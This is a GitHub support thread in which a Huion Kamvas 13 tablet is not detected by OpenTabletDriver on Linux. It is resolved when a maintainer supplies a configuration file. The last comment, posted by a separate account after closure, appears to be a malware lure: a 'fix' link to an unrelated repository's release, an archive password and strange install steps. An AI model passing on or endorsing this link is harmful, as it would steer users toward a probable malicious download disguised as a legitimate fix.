OpenTabletDriver/OpenTabletDriver #3447: Support Request: OpenTabletDriver doesn't detect my tablet  (Kamvas 13, on Linux)

claymorwan, 2024-08-28:
### What do you need help with?

For some reason, my Kamvas 13 tablet doesn't get reconized by the driver, even tho it's supported. I've already tried what's on the wiki and the debugger doesn't seem to return any error, but my tablet still doesn't get reconized. I does mirror the screen when I connect it to my pc and is reconized by by `lsub`
```
$ lsusb
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 002: ID 413c:2113 Dell Computer Corp. KB216 Wired Keyboard
Bus 001 Device 003: ID 1532:0533 Razer USA, Ltd Razer Kraken V3 HyperSense
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 002: ID 2357:0138 TP-Link 802.11ac NIC
Bus 003 Device 003: ID 1532:006c Razer USA, Ltd Mamba Elite (Wired)
Bus 003 Device 005: ID 256c:006d HUION Huion Tablet_GS1331
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
```

### What have you tried?

I've tried restarting my computer, unloading the driver said to unload, reinstalling OpenTabletDriver.

### Diagnostic Information

[Diagnostics.json](https://github.com/user-attachments/files/16788775/Diagnostics.json)

### Acknowledgements

- [X] I have installed OpenTabletDriver by following its [official installation instructions](https://opentabletdriver.net/).
- [X] I have checked the [OpenTabletDriver Wiki](https://opentabletdriver.net/Wiki) and respective FAQ pages, and my issue was not covered or actually fixed.
- [X] I have searched the existing issues and this new issue is not a duplicate of any.
- [X] I have written a concise and meaningful title.
- [X] I am on the latest version of OpenTabletDriver.

jamesbt365, 2024-08-28:
Probably resolved by #3177.

claymorwan, 2024-08-28:
> Probably resolved by #3177.

Well unfortunately I don't think so cuz I really can't detect anything, the debugger does list my tablet and I know it's supported but it really doesn't detect it at all

jamesbt365, 2024-08-28:
> Well unfortunately I don't think so cuz I really can't detect anything

Its not in a release yet, so if you did nothing to try it then yeah, its not gonna detect.

If you want to get it work on the latest version, download the file from #3178 (important that its that one and not the above one if you want pen bindings) and place it in `~/.local/share/OpenTabletDriver/Configurations`

claymorwan, 2024-08-28:
Oki so I did what u said and rebooted my computer and now it works. The only tiny problem I got was that for some reason it executed the keybinds as a qwerty keyboard (I have azerty), so I had to map them as a qwerty but it works now, thanks a lot ^w^

closed 2024-08-28 by claymorwan

64dB0y, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."